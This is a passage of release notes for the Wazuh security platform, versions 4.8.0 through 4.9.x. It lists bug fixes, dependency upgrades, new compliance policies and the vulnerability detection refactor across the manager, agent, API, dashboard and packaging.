  • #24620 Added support for multiple Certificate Authorities files in the indexer connector.

  • #24529 Removed hardcoded cipher text size from the RSA decryption method.

  • #25094 Avoided infinite loop while updating the vulnerability detector content.

  • #26223 Fixed repeated OS vulnerability reports.

  • #25479 Fixed inconsistencies between reported context and vulnerability data.

  • #26073 Fixed concurrency issues in LRU caches.

  • #26232 Removed all CVEs related to a deleted agent from the indexer.

  • #26922 Prevented an infinite loop when indexing events in the Vulnerability Detector.

  • #26842 Fixed segmentation fault in DescriptionsHelper::vulnerabilityDescription.

  • #24034 Fixed vulnerability scanner re-scan triggers in cluster environment.

  • #23266 Updated CURL version to 8.10.0.

  • #27145 Fixed an issue where elements in the delayed list were not purged when changing nodes.

  • #27145 Added logic to avoid re-scanning disconnected agents.

Wazuh agent
  • #25452 Fixed macOS agent upgrade timeout.

  • #24531 Fixed macOS agent startup error by properly redirecting cat command errors in wazuh-control.

  • #24516 Fixed inconsistent package inventory size information in Syscollector across operating systems.

  • #24125 Fixed missing Python path locations for macOS in Data Provider.

  • #25429 Fixed permission error on Windows 11 agents after remote upgrade.

  • #24387 Fixed increase of the variable containing file size in FIM for Windows.

  • #25699 Fixed timeout issue when upgrading Windows agent via WPK.

  • #26748 Allowed unknown syslog identifiers in Logcollector's journald reader.

  • #26828 Prevented agent termination during package upgrades in containers by removing redundant kill commands.

  • #26861 Fixed handle leak in FIM's realtime mode on Windows.

  • #26900 Fixed errors on AIX 7.2 by adapting the blibpath variable.

  • #26944 Sanitized agent paths to prevent issues with parent folder references.

  • #26633 Fixed an issue in the DEB package that prevented the agent from restarting after an upgrade.

  • #26944 Improved file path handling in agent communications to avoid references to parent folders.

  • #27054 Set RPM package vendor to UNKNOWN_VALUE when the value is missing.

  • #27059 Updated Solaris package generation to use the correct wazuh-packages reference.

Ruleset
  • #22597 Fixed logical errors in Windows Server 2022 SCA checks.

  • #25224 Fixed incorrect regulatory compliance in several Windows rules.

  • #24733 Fixed incorrect checks in Ubuntu 22.04 LTS.

  • #25190 Removed a check with high CPU utilization in multiple SCA policies.

Wazuh dashboard
  • #7001 Fixed issue where read-only users could not access the Statistics application.

  • #7047 Fixed the filter being displayed cropped on screens of 575px to 767px in the vulnerability detection module.

  • #7029 Fixed no-agent alert appearing with a selected agent in the agent-welcome view.

  • #7042 Fixed security policy exception when it contained deprecated actions.

  • #7048 Fixed export of formatted CSV data with special characters from tables.

  • #7077 Fixed filter management to prevent hiding when adding multiple filters.

  • #7120 Fixed loading state of the agents status chart in the home overview.

  • #7075 Fixed border on cells in events that disappear when clicked.

  • #7116 Fixed the Mitre ATT&CK exception in the agent view, the redirections of ID, Tactics, Dashboard Icon and Event Icon in the drop-down menu, and the card not displaying information when the flyout was opened.

  • #7047 Fixed the filter displaying cropped on screens of 575px to 767px in vulnerability detection module.

  • #7119 Fixed ability to filter from files inventory details flyout of File Integrity Monitoring.

  • #7122 Removed processes state column in macOS agents.

  • #7160 Fixed invalid date filter applied on FIM details flyout.

  • #7156 Fixed the Check updates UI being displayed despite being configured as disabled.

  • #7151 Fixed filter by value in document details not working in Safari.

  • #7167 Fixed error message to prevent passing non-string values to the Wazuh logger.

  • #7177 Fixed the rendering of the data.vulnerability.reference field in the table and flyout.

  • #7072 Fixed column reordering feature.

  • #7161 Fixed endpoint group module name and indexer management order.

  • #440 Fixed incorrect or empty Wazuh API version displayed after upgrade.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.9.2 Release notes - 4 November 2024

This section lists the changes in version 4.9.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #26453 Fixed an unhandled exception during IPC event parsing.

Wazuh dashboard
  • #7128 Fixed vulnerabilities inventory table scroll.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.9.1 Release notes - 17 October 2024

This section lists the changes in version 4.9.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #24110 Improved provisioning method for wazuh-keystore to enhance security.

Wazuh agent
  • #25652 Added support for macOS 15 "Sequoia" in Wazuh Agent.

RESTful API
  • #26103 Changed the error status code thrown when basic services are down to 500.

Wazuh dashboard
  • #6977 Added feature to filter by field in the events table rows.

  • #6981 Changed the text of the query limit tooltip.

  • #6919 Upgraded the axios dependency to 1.7.4.

  • #6954 Improved MITRE ATT&CK intelligence flyout details readability.

  • #6984 Upgraded Event-tab column selector to show picked columns first.

  • #6960 Changed vulnerabilities.reference to links in Vulnerability Detection > Inventory columns.

  • #6982 Upgraded the follow-redirects dependency to 1.15.6.

  • #6956 Changed many loading spinners in some views to loading search progress.

  • #6999 Removed the XML autoformat function group configuration due to performance issues.

  • #7023 Removed the PDF report footer year.

  • #7086 Removed data grid tables from Threat Hunting dashboard, GitHub panel, and Office365 panel.

Packages
  • #3111 Added offline installation assistant import for the downloaded GPG Wazuh key.

  • #3098 Changed version to tag reference in source_branch references.

  • #3118 Changed Filebeat passwords only when installing Wazuh Server or changing passwords.

  • #3119 Updated SECURITY.md format.

  • #3121 Added stage parameter in bump_version script.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #24909 Fixed vulnerability detector issue where RPM upgrade wouldn't download new content.

  • #25667 Fixed uncaught exception at Keystore test tool.

  • #25705 Replaced eval calls with ast.literal_eval.

  • #26277 Fixed the cluster being disabled by default when loading configurations.

  • #25945 Added support for ARM packages for wazuh-manager.

Wazuh agent
  • #24910 Fixed agent crash on Windows version 4.8.0.

  • #25209 Fixed data race conditions at FIM's run_check.

  • #24376 Fixed Windows agent crashes related to syscollector.dll.

  • #25445 Fixed errors related to the libatomic.a library on AIX 7.X.

  • #24932 Fixed errors in Windows Agent where EvtFormatMessage returned errors 15027 and 15033.

  • #25459 Fixed FIM issue where it couldn't fetch group entries longer than 1024 bytes.

  • #25469 Fixed Wazuh Agent crash at syscollector.

  • #23528 Fixed a bug in the processed dates in the AWS module related to the AWS Config type.

  • #24694 Fixed an error in Custom Logs Buckets when parsing a CSV file that exceeds a certain size.

  • #26108 Fixed macOS syslog and ULS not configured out-of-the-box.

RESTful API
  • #25764 Fixed requests logging to obtain the hash_auth_context from JWT tokens.

  • #25216 Enabled API to listen to both IPv4 and IPv6 stacks.

Wazuh dashboard
  • #6933 Fixed issue causing vulnerability dashboard to fail loading for read-only users.

  • #6905 Fixed the temporal directory variable in the command to deploy a new Windows agent.

  • #6906 Fixed an error in the command to deploy a new macOS agent that could cause the registration password to have a wrong value due to a \n inclusion.

  • #6901 Fixed rendering of an active response as disabled when it is active.

  • #6908 Fixed an error in Dev Tools when using payload properties as arrays.

  • #6987 Fixed font size in tables used in the events tab, the Threat hunting dashboard tab, and the Vulnerabilities inventory tab.

  • #6983 Fixed missing link to Vulnerabilities detection and Office 365 in the agent menu of Endpoints Summary.

  • #6983 Fixed missing options depending on agent operating system in the agent configuration report.

  • #6989 Fixed a style issue that affected the Discover plugin.

  • #6995 Fixed a problem updating the API host registry in the GET /api/check-stored-api.

  • #7019 Fixed the Open report button on the toast and the Download report icon in the reporting table in Safari.

  • #7015 Fixed style issue when unpinning an agent in the endpoint summary section.

  • #7021 Fixed overflow style on a long value filter.

  • #7056 Fixed buttons enabled for a read-only user in Endpoint groups section.

  • #7090 Fixed the automatic page refresh in dashboards and prevented duplicate requests.

Packages
  • #3110 Fixed bug when changing the Filebeat URL in the Installation Assistant.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.9.0 Release notes - 5 September 2024

This section lists the changes in version 4.9.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

This release introduces several significant updates aimed at enhancing functionality, compatibility, and user experience. Key updates include support for journald logs in Logcollector, improved compatibility with OpenSearch 2.13.0, and integration with AWS Security Hub. Additionally, there are improvements to WPK packages and enhancements in the Wazuh-API with Connexion 3.0 and Uvicorn support. The release also addresses numerous bugs, further stabilizing the platform and improving overall performance.

  • Journald support in Logcollector: Systemd's journald logging is now supported, enabling Logcollector to monitor these logs, which can provide valuable information for users.

  • Integrate Wazuh with AWS Security Hub: Wazuh now integrates with AWS Security Hub, enabling users to manage security and assess compliance with best practices directly within AWS.

  • Improve WPKs: The WPK packages' logic has been streamlined, reducing complexity, especially in the backup/rollback process, and ensuring smoother updates.

  • Refactoring and redesign Endpoints Summary charts: The Endpoints Summary charts have been refactored and redesigned for improved clarity and usability.

  • New or updated SCA policies: Added support for Oracle Linux 9, Alma Linux 9, and Rocky Linux 9, and updated policies for RedHat 7, CentOS 7, RedHat 8, and CentOS 8.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #17306 Added alert forwarding to Fluentd.

  • #20285 Changed logging level of wazuh-db recv() messages from error to debug.

  • #16666 Fixed malformed JSON error in wazuh-analysisd.

  • #23727 Added missing functionality for vulnerability scanner translations.

  • #23722 Improved performance for vulnerability scanner translations.

  • #24536 Enhanced vulnerability scanner logging to be more expressive.

  • #17306 The manager now supports alert forwarding to Fluentd.

  • #23513 Added the HAProxy helper to manage load balancer configuration and automatically balance agents.

  • #23222 Added a validation to avoid killing processes from external services.

  • #23996 Enabled certificates validation in the requests to the HAProxy helper using the default CA bundle.

  • #21195 Sanitized the integrations directory code.

Wazuh agent
  • #19753 Removed the directory /boot from the default FIM settings for AIX.

  • #21690 Improved debugging logs for Windows registry monitoring configuration. Now the Wrong registry value type warnings include the registry path to help troubleshooting. Thanks to Zafer Balkan (@zbalkan).

  • #21287 Added Amazon Linux 1 and Amazon Linux 2023 support for the Wazuh installation assistant.

  • #23137 Added Journald support in Logcollector.

  • #20727 Fixed Windows Agent 4.8.0 permission errors on Windows 11 after upgrade.

  • #22440 Fixed Syscollector not checking if there's a scan in progress before starting a new one.

  • #16487 Fixed alerts are created when syscheck diff DB is full.

  • #2195 Fixed Wazuh deb uninstallation to remove non-config files.

  • #23273 Fixed improper Windows agent ACL on non-default installation directory.

  • #17664 Fixed socket configuration of an agent is displayed.

  • #18494 Fixed wazuh-modulesd printing child process not found error.

  • #23848 Fixed issue with an agent starting automatically without reason.

  • #17415 Fixed GET /syscheck to properly report size for files larger than 2GB.

  • #23203 Added support for Amazon Security Hub via AWS SQS.

  • #20624 Refactored and modularized the Azure integration code.

  • #23790 Improved logging of errors in Azure and AWS modules.

  • #22583 Dropped support for Python 3.7 in cloud integrations.

RESTful API
  • #23199 Replaced aiohttp server with uvicorn.

  • #23199 Changed the PUT /groups/{group_id}/configuration endpoint response error code when uploading an empty file.

  • #23199 Changed the GET, PUT and DELETE /lists/files/{filename} endpoints response status code when an invalid file is used.

  • #23199 Changed the PUT /manager/configuration endpoint response status code when uploading a file with invalid content-type.

  • #23094 Added support in the Wazuh API to parse journald configurations from the ossec.conf file.

  • #24360 Added user-agent to the CTI service request.

  • #21653 Merged group files endpoints (GET /groups/{group_id}/files/{filename}) into one that uses the raw parameter to receive plain text data.

  • #22388 Removed the hardcoded fields returned by the GET /agents/outdated endpoint and added the select parameter to the specification.

  • #22423 Updated the regex used to validate CDB lists.

  • #22413 Changed the default value for empty fields in the GET /agents/stats/distinct endpoint response.

  • #22380 Changed the Wazuh API endpoint responses when receiving the Expect header.

  • #22745 Enhanced Authorization header values decoding errors to avoid showing the stack trace and fail gracefully.

  • #22908 Updated the format of the fields that can be N/A in the API specification.

  • #22954 Updated the Wazuh API specification to conform with the current endpoint requests and responses.

  • #22416 Removed the cache configuration option from the Wazuh API.

Ruleset
  • #19754 Clarified the description for rule ID 23502 about solved vulnerabilities.

  • #17784 Added new SCA policy for Rocky Linux 8.

Other
  • #20778 Upgraded external OpenSSL library dependency version used by Wazuh from V1 to V3.

  • #22680 Upgraded external connexion library dependency version to 3.0.5 and its related interdependencies.

Wazuh dashboard
  • #6145 Added AngularJS dependencies.

  • #6580 Migrated from AngularJS to ReactJS. #6555 #6618 #6613 #6631 #6594 #6893

  • #6120 Removed legacy embedded discover component.

  • #6268 Refactored the Endpoints Summary charts.

  • #6250 Added agent groups edition to Endpoints Summary. #6274

  • #6476 Added a filter to select outdated agents and the Upgrade agent action to Endpoints Summary. #6501 #6529 #6648

  • #6337 Changed the way the configuration is managed in the backend side. #6573

  • #6337 Moved the content of the API is down and Check connection views to the Server APIs view.

  • #6545 Added macOS log collection tab.

  • #6481 Removed the GET /api/timestamp API endpoint.

  • #6481 Removed the PUT /api/update-hostname/{id} API endpoint.

  • #6481 Removed the DELETE /hosts/remove-orphan-entries API endpoint.

  • #6573 Enhanced the validation for enrollment.dns on App Settings application.

  • #6607 Implemented the option to control configuration editing via API endpoints and UI.

  • #6572 Added the Journald log collector tab.

  • #6482 Implemented new data source feature on MITRE ATT&CK module.

  • #6653 Added HAProxy helper settings to cluster configuration.

  • #6660 Changed log collector socket configuration response property.

  • #6558 Added the ability to open the report file and the reporting application from toast message.

  • #6558 Added Office 365 support for agents.

  • #6716 Refactored the search bar to handle fixed and user-added filters correctly. #6755

  • #6714 Replaced the custom EuiSuggestItem component with the native component from OpenSearch UI.

  • #6800 Added pinned agent data validation when rendering the Inventory data, Stats, and Configuration tabs in Agent preview of Endpoints Summary.

  • #6534 Improvement of the filter management system by implementing new standard modules. #6772 #6873

  • #6745 Generate URL with predefined filters.

  • #6782 Removed unused API endpoints from creation of old visualizations: GET /elastic/visualizations/{tab}/{pattern}.

  • #6839 Changed permalink field in the Events tab table in VirusTotal to show an external link.

  • #6890 Changed the internal control from Endpoint Groups to a control via URL.

  • #6882 Changed the internal control from MITRE ATT&CK > Intelligence > Table to a control via URL.

  • #6886 Changed the display of rule details flyout to be based on URL.

  • #6161 Changed the logging system to use the one provided by the platform.

  • #6161 Removed logs.level setting.

  • #6161 Removed the usage of wazuhapp-plain.log, wazuhapp.log, wazuh-ui-plain.log, and wazuh-ui.log files.

  • #6161 Removed the App logs application.

  • #6161 Removed API endpoint GET /utils/logs/ui.

  • #6161 Removed API endpoint GET /utils/logs.

  • #6848 Added wz-link component to handle redirections.

  • #6902 Removed embedded dom-to-image dependency.

  • #6902 Added embedded and customized dom-to-image-more dependency.

  • #6949 Changed the order of columns in Vulnerabilities Detection > Events table.

Packages
  • #2989 Updated Password Tool to add default user and password to the filebeat.yml when changing passwords

  • #2991 Allow installation on any OS

  • #2970 Added support for Rocky Linux 9.4 in Installation assistant

  • #2944 Update API script file name

  • #2698 Added new Azure module files

  • #2945 Added support for Ubuntu 24.04 in Installation assistant

  • #2922 Changed log message when not yum nor apt-get are found. Added clearer instructions on following steps

  • #2911 Cert-tool logfile added. Modified common_logger function to write on files without root permission

  • #2908 Added bash dependency to Wazuh agent RPM for AIX

  • #2909 Prevent failed checks related to dashboard and indexer

  • #2900 Installation Assistant language agnostic

  • #2882 Added rollBack to several exit points

  • #2753 Adding support for Amazon Linux 1, 2, and 2023

  • #2790 Added support for AL2023 in WIA

  • #2300 Added SCA policy for Rocky Linux 8 in SPECS.

  • #3070 Removed migrated and unsupported code.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #20505 Fixed compilation issue for local installation.

  • #24375 Fixed a warning when uninstalling the Wazuh manager if the vulnerability detection feed is missing.

  • #24393 Ensured vulnerability detection scanner log messages end with a period.

Wazuh agent
  • #19146 Fixed command monitoring on Windows to support UTF-8 characters.

  • #21455 Fixed an error in Windows agents preventing whodata policies loading.

  • #21595 Fixed an unexpected error where the manager received messages with a reported size not corresponding to the bytes received.

  • #21729 Prevented backup failures during WPK upgrades. A dependency check for the tar package was added.

  • #22210 Fixed a crash of the agent due to a library incompatibility.

  • #21728 Fixed an error of the Osquery integration on Windows that prevented loading osquery.conf.

  • #22588 Fixed a crash in the agent Rootcheck component when using <ignore>.

  • #20425 Fixed the agent not deleting the wazuh-agent.state file in Windows when stopped.

  • #24412 Fixed error in packages generation for CentOS 7.

  • #22392 Fixed Azure auditLogs/signIns status parsing (thanks to @Jmnis for the contribution).

  • #22621 Fixed how the S3 object keys with special characters are handled in the Custom Logs Buckets integration.

RESTful API
  • #20507 Improved XML validation to match the Wazuh internal XML validator.

  • #22428 Fixed bug in GET /groups.

  • #24946 Fixed the GET /agents/outdated endpoint query.

Ruleset
  • #22178 Added parsing of the optional node= log heading field to Audit decoders.

Other
  • #19794 Fixed a buffer overflow hazard in HMAC internal library.

Wazuh dashboard
  • #6237 Fixed disappearing scripted fields when index pattern fields refreshed.

  • #6667 Fixed invalid IP address ranges and file hashes in sample alert scripts.

  • #6558 Fixed error of malformed table row in PDF report generation.

  • #6730 Fixed the validation of the maximum allowed time interval for cron jobs.

  • #6747 Fixed styles in small height viewports.

  • #6770 Fixed behavior in Configuration Assessment when changing API.

  • #6871 Fixed the maximum width of the clear session button in the ruleset test view.

  • #6876 Fixed the width of the last modified column of the table in Windows Registry.

  • #6880 Fixed redirection to FIM > Inventory > Files from FIM > Inventory > Windows Registry when switching to a non-Windows agent.

Packages
  • #3063 Fixed Kibana server change password.

  • #3074 Fixed bugs in the offline installation using the installation assistant.

  • #3082 Fixed bug when inserting Filebeat template.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.8.2 Release notes - 20 August 2024

This section lists the changes in version 4.8.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Resolved issues

This release resolves known issues as the following:

Manager
  • #25225 Added a fix for when remoted fails to read a message.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.8.1 Release notes - 18 July 2024

This section lists the changes in version 4.8.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Manager
  • #24357 Added dedicated RSA keys for keystore encryption.

RESTful API
  • #24173 Updated the GET /manager/version/check endpoint response to always include the uuid field.

Other
  • #24108 Upgraded external Jinja2 library dependency version to 3.1.4.

  • #23925 Upgraded external requests library dependency version to 2.32.2.

Packages
  • #3005 Added -A|--api option validation to the wazuh-passwords-tool.sh script for changing API user credentials.

Resolved issues

This release resolves known issues as the following:

Manager
  • #24308 Fixed a bug in upgrade_agent CLI where it occasionally hung without showing a response.

  • #24341 Fixed a bug in upgrade_agent CLI where it occasionally raised an unhandled exception.

  • #24509 Changed keystore cipher algorithm to remove the reuse of sslmanager.cert and sslmanager.key.

Agent
  • #23989 Fixed the macOS agent to retrieve correct CPU name.

Dashboard plugin
  • #6778 Removed the unnecessary delay body parameter on server API requests.

  • #6777 Fixed home KPI links with custom or index pattern where the title is different from the ID.

  • #6793 Fixed the colors related to vulnerability severity levels on the Vulnerability Detection dashboard.

  • #6827 Fixed pinned agent error in vulnerabilities events tab.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.8.0 Release notes - 12 June 2024

This section lists the changes in version 4.8.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

This release introduces a major refactor of the Vulnerability Detector module that increases coverage and improves reliability by using a centralized feed of curated vulnerabilities maintained by Wazuh. It introduces global queries for vulnerability detection information, allowing users to search through vulnerability detection data across all endpoints.

The Wazuh dashboard notifies users whenever there's a newer Wazuh version available and offers a revamped UX navigation experience by completely overhauling the menu layout.

To support the centralized vulnerability feed and update check services, Wazuh has developed a new platform aimed at integrating and distributing Cyber Threat Intelligence (CTI) data.

Package inventory can now collect information from expanded sources, including the Snap package manager.

The release also addresses hundreds of bugs of varying impacts, further stabilizing the platform and improving the overall user experience.

  • Vulnerability Detector refactor: Vulnerability detection uses a centralized feed maintained by Wazuh and introduces global queries, significantly improving vulnerability detection capabilities and performance.

  • Update check service UI: Users can now be notified whenever there's a new Wazuh version available.

  • Wazuh dashboard UX redesign: A significant overhaul aimed at enhancing the user interface and experience, making navigation and operation more intuitive.

  • Snap packages support & PYPI and Node packages support: Wazuh now includes support for inventorying packages installed through the Snap package manager, improving visibility into software management.

Breaking changes
Manager
  • The Vulnerability Detection module no longer downloads external vulnerability feeds indexed by Canonical, Debian, Red Hat, Arch Linux, Amazon Linux Advisories Security (ALAS), Microsoft, and the National Vulnerability Database (NVD). Instead, the vulnerability detection capability now uses the new Wazuh CTI platform. wazuh #14153

  • The Vulnerability Detection module requires setting up communication with the Wazuh indexer. wazuh #14153

  • The Vulnerability Detector module has been renamed to Vulnerability Detection. The vulnerability-detector configuration option has been renamed to vulnerability-detection. wazuh #19781

Dashboard plugin
  • The Wazuh dashboard disabled_roles setting has been removed. Now, the Wazuh dashboard is visible to every Wazuh indexer role. wazuh-dashboard-plugins #5841

  • The Wazuh dashboard customization.logo.sidebar setting has been removed, and the sidebar logo is no longer customizable. wazuh-dashboard-plugins #5841

  • The extensions.* settings have been removed. Now, all Wazuh modules are visible in the main menu. wazuh-dashboard-plugins #5841

  • The default Wazuh dashboard home URL has changed from https://<WAZUH_DASHBOARD_URL>/app/wazuh to https://<WAZUH_DASHBOARD_URL>/app/wz-home. You can check the /etc/wazuh-dashboard/opensearch_dashboard.yml configuration file and replace the uiSettings.overrides.defaultRoute: /app/wazuh setting with uiSettings.overrides.defaultRoute: /app/wz-home if needed. An app not found error will appear if this value is incorrect. wazuh-packages #2497

What's new

This release includes new features or enhancements as the following:

Manager
  • #21201 Refactored vulnerability detection capability.

  • #18476 Improved wazuh-db detection of deleted database files.

  • #16893 Added timeout and retry parameters to the VirusTotal integration.

  • #18988 Extended wazuh-analysisd EPS metrics with events dropped by overload and remaining credits in the previous cycle.

  • #19819 Replaced Filebeat date index name processor to ensure the indices are identifiable by the index alias for auto-rollover.

  • #18466 Updated API and framework packages installation commands to use pip instead of direct invocation of setuptools.

  • #17015 Refactored how cluster status dates are treated in the cluster.

  • #21602 The log message about file rotation and signature from wazuh-monitord has been updated.

  • #21670 Implemented a dedicated keystore for indexer configuration to improve management of sensitive information.

  • #22774 Improved Wazuh-DB performance by adjusting SQLite synchronization policy.

  • #17750 Upgraded docker-compose V1 to V2 in API Integration test scripts.

Agent
  • #15740 Added snap package manager support to Syscollector.

  • #18574 Disabled host's IP query by Logcollector when ip_update_interval=0.

  • #17932 Added event size validation for the external integrations.

  • #17623 Refactored and modularized the AWS integration code.

  • #17623 Added new unit tests for the AWS integration.

  • #19064 Added multiple tenants support to the MS Graph integration module.

  • #16200 FIM now buffers the Linux audit events for who-data to prevent side effects in other components.

  • #19720 The sub-process execution implementation has been improved.

  • #20649 Added geolocation mapping for the AWS WAF events.

  • #21530 Added a validation to reject unsupported regions when using the inspector service.

  • #21561 Added additional information on some AWS integration errors.

  • #21791 Replaced the usage of fopen with wfopen to avoid processing invalid characters on Windows.

  • #21637 Fixed installation script to prevent macOS agent to start automatically after installation.

RESTful API
  • #19952 Added new GET /manager/version/check API endpoint to obtain information about new releases of Wazuh.

  • #20119 Removed PUT /vulnerability, GET /vulnerability/{agent_id}, GET /vulnerability/{agent_id}/last_scan and GET /vulnerability/{agent_id}/summary/{field} API endpoints as they were deprecated in version 4.7.0. Use the Wazuh indexer REST API instead.

  • #20420 Added the auto option to the ssl_protocol setting in the API configuration. This option enables automatic negotiation of the TLS certificate.

  • #21572 Removed the compilation_date field from GET /cluster/{node_id}/info and GET /manager/info endpoints.

  • #22387 Deprecated the cache configuration option.

  • #17048 Removed the custom parameter from the PUT /active-response endpoint.

  • #22727 Added API configuration option to protect the Wazuh indexer configuration from updates.

Ruleset
  • #19528 Added rules to detect IcedID attacks.

  • #17780 Added new SCA policy for Amazon Linux 2023.

  • #18721 Revised SCA policy for Ubuntu Linux 18.04.

  • #17515 Revised SCA policy for Ubuntu Linux 22.04.

  • #18440 Revised SCA policy for Red Hat Enterprise Linux 7.

  • #17770 Revised SCA policy for Red Hat Enterprise Linux 8.

  • #17412 Revised SCA policy for Red Hat Enterprise Linux 9.

  • #17624 Revised SCA policy for CentOS 7.

  • #18439 Revised SCA policy for CentOS 8.

  • #18010 Revised SCA policy for Debian 8.

  • #17922 Revised SCA policy for Debian 10.

  • #18695 Revised SCA policy for Amazon Linux 2.

  • #18985 Revised SCA policy for SUSE Linux Enterprise 15.

  • #19037 Revised SCA policy for macOS 13.0 Ventura.

  • #19515 Revised SCA policy for Microsoft Windows 10 Enterprise.

  • #20044 Revised SCA policy for Microsoft Windows 11 Enterprise.

  • #17518 Updated MITRE DB to v13.1.

Other
  • #20003 Upgraded embedded Python version to 3.10.13.

  • #23112 Upgraded external aiohttp library dependency version to 3.9.5.

  • #22221 Upgraded external cryptography library dependency version to 42.0.4.

  • #21710 Upgraded external curl library dependency version to 8.5.0.

  • #20003 Upgraded external grpcio library dependency version to 1.58.0.

  • #23112 Upgraded external idna library dependency version to 3.7.

  • #21684 Upgraded external Jinja2 library dependency version to 3.1.3.

  • #21710 Upgraded external libarchive library dependency version to 3.7.2.

  • #20003 Upgraded external numpy library dependency version to 1.26.0.

  • #21710 Upgraded external pcre2 library dependency version to 10.42.

  • #20493 Upgraded external pyarrow library dependency version to 14.0.1.

  • #21710 Upgraded external rpm library dependency version to 4.18.2.

  • #20741 Upgraded external SQLAlchemy library dependency version to 2.0.23.

  • #21710 Upgraded external sqlite library dependency version to 3.45.0.

  • #20630 Upgraded external urllib3 library dependency version to 1.26.18.

  • #21710 Upgraded external zlib library dependency version to 1.3.1.

  • #21710 Added external lua library dependency version 5.3.6.

  • #21749 Added external PyJWT library dependency version 2.8.0.

  • #21749 Removed external python-jose and ecdsa library dependencies.

Dashboard plugin
  • #5791 Added remember server address check.

  • #6093 Added a notification about new Wazuh updates and a button to check their availability. #6256 #6328

  • #6083 Added the ssl_agent_ca configuration to the SSL Settings form.

  • #5896 Added global vulnerabilities dashboards.

  • #5840 Added an agent selector to the agent view.

  • #5840 Moved the Wazuh menu into the side menu. #6226 #6423 #6510 #6591

  • #5840 Removed the disabled_roles and customization.logo.sidebar settings.

  • #5840 Removed module visibility configuration and removed the extensions.* settings.

  • #6035 Updated all dashboard visualization definitions. #6632 #6690

  • #6067 Reorganized tabs order in all modules.

  • #6174 Removed the implicit filter of WQL language of the search bar UI.

  • #6373 Changed the API configuration title to API Connections.

  • #6366 Removed Compilation date field from the Status view.

  • #6361 Removed WAZUH_REGISTRATION_SERVER variable from Windows agent deployment command.

  • #6354 Added a dash character and a tooltip element to Run as in the API configuration table to indicate it's been disabled.

  • #6364 Added tooltip element to Most active agent in Details in the Endpoint summary view and renamed a label element. #6421

  • #6379 Changed overview home top KPIs. #6408 #6569

  • #6341 Removed notice of old Discover deprecation.

  • #6492 Updated the PDF report year number to 2024.

  • #6702 Adjusted font style of Endpoints summary KPIs, Index pattern, and API selectors, as well as adjusted the Dev Tools column widths.

Packages
  • #2332 Added check into the installation assistant to prevent the use of public IP addresses.

  • #2365 Removed the postProvision.sh script. It's no longer used in OVA generation.

  • #2364 Added curl error messages in downloads.

  • #2469 Improved debug output in the installation assistant.

  • #2557 Added SCA policy for Amazon Linux 2023 in SPECS.

  • #2558 Wazuh password tool now recognizes UI created users.

  • #2562 Bumped Wazuh indexer to OpenSearch 2.10.0.

  • #2563 Bumped Wazuh dashboard to OpenSearch Dashboards 2.10.0.

  • #2577 Added APT and YUM lock logic to the Wazuh installation assistant.

  • #2164 Deprecated CentOS 6 and Debian 7 for the Wazuh manager compilation, while still supporting them in the Wazuh agent compilation.

  • #2588 Added logic to the installation assistant to check for clean Wazuh central components removal.

  • #2615 Added branding images to the header of Wazuh dashboard.

  • #2696 Updated Filebeat module version to 0.4 in Wazuh installation assistant.

  • #2695 Added content database in RPM and DEB packages.

  • #2669 Upgraded botocore dependency in WPK package Docker containers.

  • #2738 Added xz utils as requirement.

  • #2777 Added support for refactored vulnerability detector in the installation assistant.

  • #2797 The Wazuh installation assistant now uses 127.0.0.1 instead of localhost in the Wazuh dashboard configuration. #2808

  • #2801 Added check into the installation assistant to ensure sudo package is installed.

  • #2802 Added the Wazuh keystore functionality to the passwords tool.

  • #2809 Upgrade scripts to support building Wazuh with OpenSSL 3.0.

  • #2784 Added rollback and exit in case the Wazuh indexer security admin fails.

  • #2804 Added the keystore tool for both RPM and DEB manager packages creation. #2802

  • #2798 Add compression for the Wazuh manager due to inclusion of Vulnerability Detection databases.

  • #2796 Simplified the Wazuh dashboard help menu entries.

  • #2792 Improved certificates generation output when using the Wazuh Installation Assistant and the Wazuh Certs Tool.

  • #2891 Skipped certificate validation for CentOS 5 package generation.

  • #2890 Updated the file permissions of vulnerability detection-related directories.

  • #2966 Added Ubuntu 24 support to the Wazuh installation assistant.

  • #2422 Added the possibility of registering the localhost domain in the installation assistant and in the cert-tool.

  • #2408 Added new AWS files to Solaris SPECS.

  • #2553 Added new role to grant ISM API permissions.

  • #2578 Changed the order of Explore category and Indexer/dashboard management title on dashboard.

  • #2582 Added the ISM init script to the Wazuh indexer package.

  • #2584 Added ISM script in installation assistant.

  • #2586 Moved ISM scripts from package to base.

  • #2590 Extended indexer-init.sh to accept arguments.

  • #2592 Updated the initialize cluster script in the offline installation workflow.

  • #2598 Updated min_doc_count value.

  • #2606 Improved ISM init script.

  • #2609 Adapted wazuhapp and Wazuh dashboard to install the Wazuh CheckUpdates and Core plugins.

  • #2639 Changed check yum lock function.

  • #2653 Collapsed initially the application categories in the side menu of Wazuh dashboard.

  • #2687 Added common_checkAptLock function.

  • #2700 Updated indexer-ism-init.sh.

  • #2711 Ensured config is present in ossec.conf after upgrade via rpm.

  • #2712 Added wazuh-filebeat template to Wazuh indexer.

  • #2713 Removed wazuh-template json.

  • #2726 Updated indexer-ism-init.sh.

  • #2733 Updated indexer-ism-init.sh.

  • #2742 Vulnerability detection refactor.

  • #2748 Removed flag --download-content.

  • #2782 Split CentOS and RHEL check.

  • #2789 Updated Wazuh favicon for Safari.

  • #2795 Replaced category management description.

  • #2792 Improved certificates generation output when using the Wazuh Installation Assistant and the Wazuh Certs Tool.

